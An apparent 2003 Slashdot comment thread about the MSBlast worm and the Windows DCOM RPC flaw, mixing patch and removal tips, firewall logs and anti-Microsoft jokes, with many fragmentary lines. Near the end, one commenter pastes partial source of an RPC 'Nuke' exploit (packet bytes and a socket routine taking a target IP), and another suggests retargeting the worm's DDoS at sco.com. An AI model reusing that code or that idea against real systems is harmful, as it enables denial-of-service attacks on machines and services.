It makes it sound like RPC has the flaw instead of Microsoft's implementation of RPC being the problem.
http://www.askthevoid.com
I got this virus around noon today and just got it all taken care of. What you need to do is go and download the patch from microsoft. You can find it here
I suggest you first disable RPC or set the status to not restart the machine (type in services.msc in run) and then go to the site and download the patch.
I feel sorry for anyone depending on Windoze Update. Like many M$ products it's broken, at least part of the time. I'm pasting below a couple of posts from NT BugTraq and Full-Disclosure last month discussing this:
a ult.asp?pid=36&sid=1& A2=ind0307&L=ntbugtraq&F=P&S=&P=92 18
-----------------
Message: 16
Date: Wed, 30 Jul 2003 17:09:14 -0500
From: "Schmehl, Paul L" (email address removed)
To:
Subject: [Full-Disclosure] Patching networks redux
For all those experts who have mastered patching your networks, please ignore this post.
For the rest of you, testing has shown that some patch management tools are incorrectly reporting that MS03-026 is installed when it's not (notably Windows Update and Update Expert, among others.) The accuracy of the tool depends on how they check for the patch level. If they check the registry (like Windows Update and Update Expert do) they will *incorrectly* report that MS03-026 has been installed when if fact the files have not been updated. If they do MD5 checksums (like Hfnetchk or MBSA), they will correctly report the patch level.
The Retina tool from eEye (and I would assume the IIS commandline tool as well) is correctly reporting what *is* patched and what is *not* patched, so you need to rely on those to give you accurate information. You could actually have users going to Windows Update and finding no patches available when in fact they are still vulnerable. You could also have users for whom you've pushed out the patch who have overwritten the files with older versions, yet your tools are reporting them as patched.
Of course the experts never have these problems, but for the mere mortals, caveat emptor.
Paul Schmehl (email address removed)
Adjunct Information Security Officer
The University of Texas at Dallas
-----------------
http://www.ntbugtraq.com/def
MS03-026 - are you patched? Windows Update isn't sure!
Content-Type:
text/plain; charset="iso-8859-1"
FYI, it is worth reminding people that some patch checking tools don't do a complete check. Windows Update doesn't check files, and it would seem that other products have problems also.
Some tools only check for the presence of a registry key indicating that a hotfix was applied. Other tools, such as Shavlik's HFNetchk and MBSA (and others) actually check file details, including a checksum, to verify that the files in play are actually the right versions.
I was speaking with Jeff.t.Parker @ hp.com about this issue. His observations confirm this (see below). If patched files are reverted to previous versions, for whatever reason, Windows Update and (at least in this case) Update Expert (and possibly other such tools) will incorrectly assert you have the patch applied when in fact you don't.
He wrote in to advise that Update Expert (v6.0 build 6069) is giving erroneous results at least in some cases. After applying SP4 concurrently with MS03-026 (using Update Expert), Jeff noticed some interesting results. The resulting versions of the files contained in MS03-026 on some machines were;
5.0.2195.6692 ole32.dll 5.0.2195.6701 rpcrt4.dll 5.0.2195.6702 rpcss.dll
This led to Windows Update and Update Expert both reporting that the systems had MS03-026 applied (wrong). MBSA and eEye's Retina both said the systems *did not* have MS03-026 applied (right).
While this may be a problem with the way Update Expert deploys Service Pack + Hotfix combinations, it also demonstrates the problem Windows Update has by not being able to examine file details (relying only on registry entries).
How many systems are out there now who believe they have MS03-026 applied, can't get it offered to them from Windows Update, but in fact don't have it applied at all??
Cheers, Russ - NTBugtraq Editor
-----------------------
I work tech support for an ISP. We are getting a lot of calls from customers that have already been infected. Once this is the case, and you attempt to install the patch, the system will not allow you to shutdown or restart in a normal manner. So the registry writes are not done, in effect not even installing the patch. The other scenario we have seen is that if you DO get the patch to install, the RPC service is shutdown midway, and kills the install process, and throws the machine into a infinite loop of reboots. At this point... I'm thankful I run Linux. This just provides one more piece of ammunition for the pro-Linux debate.
Are you whoring for karma today ?
... just make it good).
... oh wait ... this is Slashdot ...
The first sentence read "correct a security vulnerability in a Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface".
Don't know how you could think that Microsoft was misleading anybody (by all means, slam Microsoft
You could only be mislead if you ignored the rest of the article in question
Cheers,
JAKD
spam popups every day; port 135 wide open, DCOM blazing away
Post-SP3:
no popups; port 135 still wide open, but not much there because DCOM is now DISABLED.
Like I said: it's just a "junk box" I setup the other day because the power supply died in my "good" server box. I haven't installed the googleplex of win2k patches because I don't think it's worth it - I'm only using it temporarily and if it gets hit I'll reinstall the OS (or stick a freesco floppy in the drive and reboot). This is just something I noticed when I read today's "warning" and went into that machine to disable the offending service.
What can I say but, gotta love them M$ $ploits!
And what's so odd about this on it that it's not your daily buffer overflow..
What I do hate about this is that it does hammer my poor friends that are to afraid to switch to Linux.
This is like the Stockholm Syndrome. They've become attached to their captor/tormentor and are afraid to let go. Windows is more powerful than heroin or tabacco..
Ecora Patch Manager
Alternative "fix" to the 22 steps one:
1) insert knoppix cd in drive
2) reboot computer
3) activate booting from cd in bios
Of those to whom much is given, much is required.
So, it's been about 5 days since my computer started crashing. Actually, it didn't toally crash, but DCOM kept crashing, and occasionally RPC would crash and I'd be forced to reboot. No biggie it only happenned once that I noticed. A more common problem was Mozilla staying memory resident after I closed it out, and sucking up 50 MB of RAM (not Windows's fault). So I got used to CTRL+ALT+DEL'ing, and closing it manually. But suddenly, one day last week, Program Manager kept crashing - but not...it was closing. I did a series of rapid CAD's, and saw a program that was obviously bull. A quick trip through the registry turned up the "WindowsSuckz 4 Driver - gloaub.exe". Turned out I had a worm which was installing a backdoor. My computer could have been used as a DOS zombie, or they could have installed keylogging software! I felt....DIRTY.
/dev/ team over at America's Army will get my v1.9 for Linux edition out soon enough.
So I said "screw Microsoft". I've been a good boy. I apply an endless march of patches, service packs, hotfixes, and upgrades - more often then necessary IMHO. Well Microsoft didn't post a fix for this until nearly two weeks after it was discovered in the wild! By contrast, I remember the last Linux server I ran, a vulnerability was discovered in Apache+SQL that allowed backdoor access to a Linux system. Before my sweaty hands had finished an executive summary for da boss, a fix was issued. Literally...TWO HOURS for OpenSource to fix a bug vs Micrsoft taking TWO WEEKS!
Well I had dabbled in Linux for a while, I felt confident, and I was impressed by the latest round of offerings from RedHat, Suse, Mandrake, and Knoppix. So, I switched. I now run KDE, I use XawTV for my tuner card, Xine for playing DVD and video files, CUPS lets me print even over a network, SAMBA lets me share files....hell, you get the idea. The only thing I can't do is play windows games. I left a clean WinXP install for playing games until Wine gets that little "reentrant libc" issue fixed, and I'm sure the
Microsoft might have to learn about free market competition the hard way - by competing with an OS that is not only free, but better.
Windows can be made more secure by editing the registry to turn off some of the network services. The steps recommended in the following Windows security page are somewhat of a pain to do, but are useful.
s rv_res_wi n.en.html
Minimization of network services on Windows systems
http://www.hsc.fr/ressources/breves/min_
For those with 2.4.x kernels try on your upstream connection (as root):
# iptables -I INPUT 1 -i ppp0 -p tcp --dport 135 --syn -j LOG --log-level info
Now sit back and watch your console/x-console or tail the appropriate log file while the packets come in (with source address may I add...)
I'm getting about 3-4 connection attempts per min. and I'm on dialup!
NOTES:
1- Change ppp0 above to the name of your Internet interface if not using ppp0 (ie. eth0, eth1, etc)
2- Do not do the above if you receive normal traffic on port 135 (if you have a Windows share exposed on said interface, ie. tru samba) or your logs will be swamped.
perhaps it's time to get a real operating system and quit playing with insecure toys.
and several sites are now listing Linux (most versions) now vulnerable to a variant emerging in the last two hours in Europe. Apache servers mostly.
My network got hit over port 80 on the firewall, a port left open for certain services... all of my workstations sans one test workstation with teh patch in place were hit, and two servers out of four. The fix is NOT in autoupdate for XP, you have to do the manual update to get it.
Nice try, but that bit about having a girlfriend was Just Too Obvious.
Someday, you're going to die. Get over it.
I've had iptables logging port 135 accesses for about two hours now. 55 total attempts, 44 from unique hosts. Most within my ISP. Wheee!
*sigh*
One line blog. I hear that they're called Twitters now.
In order to patch an infected system while
/windows/system/msblast.exe file and then keep it open with word. The file lock kept the msblast.exe from restarting on my system when connected to the net.
connected to the net do the above steps look for both MSBLAST and msblast in the registry.
Also create a
!joatlanta@@yahoo.com
Or you could just stop at step 1. It'll be extremely secure in that configuration...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Just bought my wife a new XP machine - because she has been having issues with the crappy linux boxes I have given her [300mhz should be fast enough for anyone...](all of my machines are Linux - daughter has an old win98 and a linux box on kvm).
...BAM! again... This time its an 'RPC' call error - 'shutting system down' message. Crap. I shut the system down and pull it completely off the network.
/. and see this post about the worm. I do a little forensics and find the c:\winnt\system32\msblast.exe, and c:\winnt\system32\pre[a-Z*]\msblast.exe.23oiu4i734 - I assume the pftp scratch file. Son-of-a-bitch.
She complained that her computer was shutting down all day - get this, I don't have any ports enabled on my router - its closed tighter than duck's ass.
So, I'm sitting there, and she decides to turn her machine back on - a few minutes later....BAM...my whole DSL network goes down.
So, not making the cause and effect connection, I call my local phone company. They are able to ping my DSL modem. So they go through the motions, and get me to hook up my XP machine to the network directly through the DSL modem...friggin' brilliant. I hook it up, and
I then check my linksys router - everything on it is reset to the defaults...everything. No ppoe settings, no password [its set to the default] - nada, nothing, zip.
I reset everything, and up comes my network - thats when I browse on over to
I also look for the registry entry to restart the worm - but don't find it (so far, so good). I delete the scratch file ok, but the msblast.exe file will not delete (the system says the wheel user isn't authorized - what kind of Mickey-Mouse operating system is this!!?)
I want to know:
1. how to clean this up?
2. how the hell did this thing ZAP my Linksys with all the ports disabled?
3. where the hell can I get my $99 back for this bogus operating system?
Lodragan Draoidh
The more you explain it, the more I don't understand it. - Mark Twain
Let's hang some stats in a thread..
:)
I've have 302 hits from 17:30 to 21:30 with the top 5 heavy hitters coming from my Comcast neighbors in Bensalem - 77, Wallingsford - 62, Lower Merion - 55, Jamieson(?) - 25, and Levittown, PA with 18 infected hosts.
Come on Besalem, call your neighbors and tell 'em to patch!!
Intelligent Life on Earth
This thing is getting around quickly...
Aug 11 21:43:29 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.233.77.64 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=26462 DF PROTO=TCP SPT=1951 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Aug 11 21:43:30 syberpc kernel: fw: IN=ppp0 OUT= MAC= SRC=66.235.38.60 DST=66.236.160.x LEN=48 TOS=0x00 PREC=0x00 TTL=115 ID=59390 DF PROTO=TCP SPT=4309 DPT=135 WINDOW=64240 RES=0x00 SYN URGP=0
It's called patching, the day it was announced. Slashdot even had an article on the thing.
"Sufferin' succotash."
Trend Micro says that this worm performs a DDoS to Windows Update Site, I'm not really sure about removing it...
-- When did Ignorance Become a Point of View?
Worms are just the internet's way of Darwinism. Every 6 months or so, you have to wake up the masses to the concept of patching.
Same goes for the really dumb viruses, like the love bug. Notice how they're always spread about 6 months apart?
See you in another 6 months....
To delete the msblast file, you may have to first open Task Manager, click the Processes tab, highlight the "msblast" process and hit the "End Process" button...then try to delete the file.
I work at a isp and we are getting slammed with calls!!!!!!!
This site is good too: http://blackviper.com/
Damn this thing caused me hell fixing my parents XP box tonight. Every time I'd get online to download the patches for it the damn thing would be touched by the worm and would reboot itself. Very annoying when downloading patches over a 56K modem.
At what price learning? At what cost wisdom? The price is a man's peace of mind, and the cost is his life.
told ya!
It doesn't change the facts, tho, does it?
Hahahahaha!
I've had that patch installed on my windows box(es) since August 4th via windows update.
I got the RPC message when ICQ automatically downloaded some patch. It kept restarting me only when I was online. I then changed the windows XP key (via corp key changer) and it worked. No more problems. I GOTS HAXORED DAMMIT
Friday morning I found my system was rebooted and sitting at a Linux prompt (I dual boot). I couldn't figure out why except the night before I had to do a reinstall of my system and previously had the Windows firewall running. Later on Friday and into Saturday I'd get system messages that RPC service terminated unexpectedly. I could never figure out the problem. Then my ex-girlfriend gets it this morning and when I get home I fight to deal with about 10 reboots in less than a 2 hour period at random times. She calls Dell and they alert her to the worm. She then alerts me that its a worm. I then use linux to do some research on it.
Short story is to delete msblast.exe from c:\windows\system32 either from linux or from a bootup dos prompt (otherwise you get access denied while in windows). Then install the patch at That's for the XP 32bit version. Win2k version is about 850k, 500k less than the XP version.
this nation, under God, shall have a new birth of freedom. -- Lincoln, Gettysburg Address
JESUS, this is the most virulent worm I've ever seen! I personally know ten people who have been infected this morning alone.
-----
PGP Key ID 0xCB8FF658
Hey, writing on drugs helped The Beatles sell merchandise...
I can't think of a good sig...
Washington Post article, Aug. 11
My network at work was infected, making today's day at work virtually work-less. Patches were installed, systems were scanned, blah blah...what a pain in the ass!
Trust me, I have one running in a Netware shop.
my concern is the bandwidth consumption of these kind of worms. It may not eat bandwidth like Slammer did, but it still impacted my download speeds...
:(
My poor torrents
Never underestimate the predictability of human stupidity...
The post was'nt a troll, merely redundant; in the same way that "monsoon season" is redundant.
I've been lazy lately with updating my windows box and managed to get this virus today. My machine was telling me it was going to shutdown within roughly ONE MINUTE from the time I started its internet connection. Nasty...
Anyway, the one thing I found that killed them both is Notepad. Just open up the executable in Notepad, type a few random characters here and there, erase some things, mess up the file header, and then save right over the virus! They're never expecting that. Make sure to kill the virus processes first, of course, or else you'll get the infamous "access violation". (In the case of msconfig32.exe, you must use the command-line tools 'tasklist' and 'taskkill') The viruses might restore themselves if you remove them from the registry, or delete the file, but they're not expecting you to corrupt the executable. If Windows, in its infinite stupidity, tries to run the virus again, it will fail harmlessly.
P.S. I know, I know, you're wondering why I'm running an unpatched XP install on my desktop. Well, I just reinstalled, and only have dialup, and I'm going back to college in a month where there's super-broadband. Downloading 30+ MB (conservative estimate) of service packs, patches, hotfixes, and updates over dialup (not even 56k, more like 28.8) seems pointless. Besides, it's interesting seeing actual virus infections happen and fixing them myself. If anything goes horribly wrong, I have my XP cd right here to reinstall again. I'll be reinstalling and patching when I get back to a real internet connection.
main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
Man, they made me put my slackware box up in the bathroom! IN THE BATHROOM! "The basement is full" they said. I already have to sleep Harry Potter-style under the stairs! You may have to run complicated networks, but I bet your Big Iron doesn't need a freakin' de-humidifier!
This has been a joke. If it were other anything than a joke, you have laughed would have.
When I first encountered this, my first attempt was to open the Task Manager, but I couldn't, the window was instantly close. Tried again... same result. I tried to open MSCONFIG to try to al least disable it and buy myself enough time to run windows update... it instantly closed. only after I ran windows update did I escape this crap worm.
Anyone else have trouble with Task Manager and MsConfig?
You think they'd actually ftp to their own boxes? Those are "rooted" boxes for sure.
I've been lazy lately with updating my windows box and managed to contract this virus. In roughly ONE MINUTE of firing up the my internet connection my machine was already shutting itself down. Nasty...
If I scan the network for PCs that listen on port 4444, will I get a list of compromised hosts ?
Insensitive clod!
Does it have anything in common with the bug in Windows discovered by Polish group.
So I'm reading this article and the "Billy" Text and thinking what a fool the guy who wrote the exploit. By openly challenging MS, this will incite MS to further tout Palladium and all the other silly "Secure computing" initiatives...Let's Just say...I hope y'all LOVE using smartcards and 'activating' applications and using only 'signed' applications... Keep doing sh** like this and we'll all be 'locked down'.
No! Do not have auto-update on. This will cause problems in a production environment. For example, SP4 does fine until it finds a server that you have actually attempted to harden using M$ IIS lockdown tool - the lockdown tool will make changes to the IIS server that SP4 will also attempt to make - the SP4 installation will crash.
Sig? We don't need no stinking sig....
It seems that it had caused a worldwide panic!
:)
I am a university student in China mainland, we connect to the internet via firewall of our university. in the recent days, many computers in local network were attacked by hackers using RPC vulnerability. PCs which were attacked reboot without any reason. Some displayed "scvhost.exe runtime error! The computer is going to shutdown within 60 seconds..."
Someone told to run Dcomcnfg.exe, and disable "Windows Distributed Component Object Model " would be help. I was wondering why? and if that really works. For I have installed the patch for Windows XP, so I can't check it myself.
ps: It is the first time to post reply on slashdot.org.
Philip Hsie! Make it possible!
winblast.exe , look for it in the reg. and c:\windows\system32
About using windows 98 se.It's so old no one writes viruses for it anymore ;-)
For the perfect birthday gift , you A**H*LE!!
If you get hit, and the computer wants to shutdown, just go into the cmd prompt and type shutdown /a
Happy Penguin :)
(sorry, couldn't resist)
Have a nice day - I am.
But seriously. Wasn't W2k3 part of Bill's new secure software initiative? I feel really bad about all those locked in end users. They don't understand this stuff and all they know is that that new OS from M$ is no different than the previous version - unsafe at any speed.
Ok so Bill Gates essentially fulfilled his promise related to making an OS that everyone can use. Ya, Joe and Jane Average can do all their music, and movies, and web content, and IM chat, etc... But they spend long hours on the phone with tech support. Now a worm is out that circumvents the patch. Most people wont likely be able to fix the problem and get online to get the patch before they're hit again.
With all the time and money average users spend trying maintain, fix, and update their system they might as well make the switch and learn to run Linux or change to Mac.
This ain't gonna get better and will probably get worse. Oh, and don't think for a minute the Longhorn, Palladium, and WinFS is going to fix this either. Cut and Paste coding is the status quo at M$ and their corporate culture is as much to blame as shotty product development.
Linux and/of OS X won't bring M$ down, they'll do that all by themselves. Having an alternative will just hasten it in all likelyhood.
I'm not saying M$ will drop of the map, but they will lose market share - it's inevitable.
Don't patch anything, no more AOL users online for a bit would be bliss.
insert "me too" comment here --->
/etc/rc.d so I could find those meself.
;) diablo II and cossakcs and roller coaster tycoon in linux in wine lemme gnow, odderwise my game machine stays.
fer once, after that damned other virus that deleted my virus software, i feel safe knowing my os is safe from this one even though it sucks donkey ballz. hate it. where is ps when I need it, and kill, and my
enough rambling. if anyone can help me play (or can slap me on the head with a didn't ya try it yet
-g
your kernel has already been hacked by your c compiler
sorry to respreck on my own comment but the nanog achives is always a good place to watch (future and past) 'net wide events.
nice perspective from the trenches.
-g
recompile yet?
it's your ass when you find due to some obscure interaction it's fragged your data...
Would anyone be so kind to change in the virus code the DDOS address?
Just change windowsupdate.com to sco.com
It's very simple...like this
before: windowsupdate.com/0
after: sco.com/0pdate.com/0
Since this hit yesterday, I've had lots of friends call me up wondering if I can fix their machines.
;-)
Of course, 75 euros if you bring me your machine, 100 euros if I have to visit. So far, 6 people have brought me their machines, the local computer repair shops are charging people something like 199 euros just to slap on a patch and a service pack.
There was a recent thread about what you have on your USB flash key dongles, this is another addition I can carry around and make money off of.
Thank you M$, for making such sucky software
the AC
Hemos is like...sci-fi fans;he thinks technology is cool, but he hasn't bothered to understand the science it's based on
According to ZoneAlarm, I've had 29640 Intrusions since last night. 21 Critical.
No, it's not the worm, I just forgot to make 192.168.0.2 trusted, that whole client server yokey...
Actually? about two-fitty.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Here's the homepage for Symantec's tool which removes this worm.
Woopty Doo Basil, what does it all mean?!
When you are shown the dialog box informing you of a system shutdown about to occur in 30 seconds or whatnot, run "shutdown /a" in a command line, assuming that you have administrator privaleges. If you don't, then log in as Administrator and do it.
At least in the consumer edition of their OS's. There's someting to be said about abusing this power for marketshare, but that's best left to the courts.
I love how a MSN Messenger can't be disabled without disabling it in outlook AND in the app itself, yet autoupdate wants you to configure it before it runs. I'm sure most users go "wha?" and click cancel.
I've posted more about this here for those interested.
1. disconnect PC from network.
2. Remove MSBLAST.exe from filesystem & registry (see the page of the antivirus producers for exact instuctions)
3. Patch the PC
4. Firewall it in case you didnt patch it right.
5. Save your data at a convienent time (LIKE NOW!)
6. Reinstall windows because someother virus might be there as well.
Reinstall windows is the "give up" option
Another day another worm.
In case you get hit by this: what our program was doing was creating some classes in one (MTA) thread, using CoMarshalInterThreadInterfaceInStream to ship them over to another (STA) thread that used CoGetInterfaceAndReleaseStream to unwrap them. And suddenly CoGetInterfaceAndReleaseStream was returning null pointers!
So now I've designed a new message into our program to deal with the case when that should-never-be-NULL pointer is NULL: "The DCOM feature of Windows is not working properly. This problem may have been caused by a virus: please check your system". I hope this strikes the right balance between informing and alarming the user...
1. Insert any bootable linux installation CD. 2. Wait till XP reboots from the worm. 3. Delete NTFS partition 4. Install Linux
Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp.
HAHAHA!!! You bought it, you deal with it, suckers!
Healthcare article at Kuro5hin
I've noticed that just recently the media is reporting more detail about computer viruses. In the past, they would just mention that a virus was spreading, maybe how many computers are affected, and that was about it. Now they often report the afflicted operating system, which we all know is almost always Microsoft's demon seed. Maybe the average computer user will learn that Microsoft is totally insecure and cause them to have second thoughts about upgrading to Microsoft's next great OS. But at least the media is no longer hiding this info from the public, who probably thinks that computer viruses spread to all computers equally on the Internet, and don't understand how specific viruses really are 99% of the time.
pot.kettle(black);
I'm sitting here at home typing on my work laptop :-) It's behind a $50 firewall (which may help this worm), but that's all when I'm not VPNed into work. When the laptop's at work it uses Port 135 and the other MS ports so it can mount file servers and printers and such, so it's configured to listen to them, and the LAN at work is configured to pass them. On the other hand, at home, the only things on Port 135 and the other MS ports are viruses and crackers. My corporate IT people could get fancy and set the internal firewalling to only listen to Port 135 from IP address ranges 10.x.x.x or whatever, but basically if I didn't have the firewall or if it let Port 135 traffic go through, my machine would be toast, and I'd bring the nice burnt toast into the office where it would start causing more trouble. It's an ugly set of problems. (Having an operating system with a fundamental clue about security helps a lot, but even there you can get application bugs, like sendmail worms and finger daemon cracks and the like.)
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Sorry for all the crap. Here is some NukeXP code. Enjoy!!! I've got an mirc script to run it if you want... /. to tell someone how many characters per line they should have.
/. to tell someone how many characters per line they should have. /. to tell someone how many characters per line they should have.
/. to tell someone how many characters per line they should have. ;
/. to tell someone how many characters per line they should have. ;
/. to tell someone how many characters per line they should have.
Http://www.cnhonker.com This is code. Not junk characters, Code. Now two few characters per line. What If I add more comments. Anyway what is it up to
#include <winsock2.h> This is code. Not junk characters, Code. Now two few characters per line. What If I add more comments. Anyway what is it up to
#include <stdio.h> This is code. Not junk characters, Code. Now two few characters per line. What If I add more comments. Anyway what is it up to
#pragma comment(lib, "ws2_32.lib")
char sendcode1[] = This is code. Not junk characters, Code. Now two few characters per line. What If I add more comments. Anyway what is it up to
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\ x02\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\ x00\x00\x01\x00"
"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\ x69\x01\x29\x3f"
"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\ x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\ x10\x00\x00\x00"
"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\ x00\x00\x02\x00"
"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00"
char sendcode2[] = This is code. Not junk characters, Code. Now two few characters per line. What If I add more comments. Anyway what is it up to
"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00"
char sendcode3[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\ x00\x02\x00\x00";
char sendcode4[] =
"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\ x3d\x3d\x3d\x3d"
"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\ x3d\x3d\x3d\x3d"
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00"
"\x50\x10\x01\x00\x00\x00\x02\x00";
char sendcode5[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00"
"\x80\xf9\x00\x00\x00\x00\x02\x00";
char sendcode6[] = This is code. Not junk characters, Code. Now two few characters per line. What If I add more comments. Anyway what is it up to
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\ x8f\x00\x00\x00"
"\xb0\xe2\x00\x00\x00\x00\x02\x00";
char sendcode7[] =
"\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\ x8f\x00\x00\x00"
"\x60\x15\x00\x00\x00\x00\x02\x00";
char sendcode8[] =
"\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\ x00\x00";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize;
SOCKET s;
char buffer[20480];
printf("= HUC Win2000/XP RPC Nuke V0.10 \r\n");
printf("= By Lion, Welcome to http://www.cnhonker.com \r\n\n");
if (argc < 2) xxxxxxxxxxxxxxxxxxxxxxxxx
{
printf("Usage:\r\n"); xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
printf(" %s <TargetIP> [TargetPort]\r\n", argv[0]); xxxxxxxxxxxxxxxxxxxxxxxxxxx
printf("Example:\r\n"); xxxxxxxxxxxxxxxxxx
printf(" %s 192.168.0.1\r\n", argv[0]);
I work at a *very* large real estate information company in southern California, and our FTP servers that pickup all of our offshore'd work are dead with this virus.
Looks like you all have another reason to recommend to your bosses NOT to outsource...
Well, one thing I've noticed over the last 2 days is that my e-mail inbox contains signifigantly less SPAM than usual. Maybe some of the servers distributing SPAM got taken down by this. I hope so. But we all know the SPAM distributors won't stay down (unfortunately).
You didn't consider that since the majority of end-users use M$ Windows, most of the virii/worms have been Windows-targeted. The number of Mac/Linux virii/worms is considerably lower. If everyone ran Linux, Lindows, or OSX, you would see a strange increase in the number of holes discovered there as well.
On the other hand, M$ has always had a bad reputation when it comes to security. When they begin to lose market share, they will change their practices - this had already happened once with the dropping of Win9X and the adoption of the NT kernel for the home user.
The biggest problem lies in configuration - most of the great virii (blaster is an exception to this rule) have penetrated M$ systems because of relatively new technologies being shipped and enabled by default with new PCs. Seriously - why did XP Pro originally come with IIS enabled?
This problem will also come to head as huge disasters begin to occur. Anybody note that the blackouts corresponded with the release of blaster? Anybody notice how quickly the government rushed out to say it wasn't the worm? Do you actually think they would admit it if it was?
[c0d3fu]: jwjb62@umr.edu || james@macrohub.com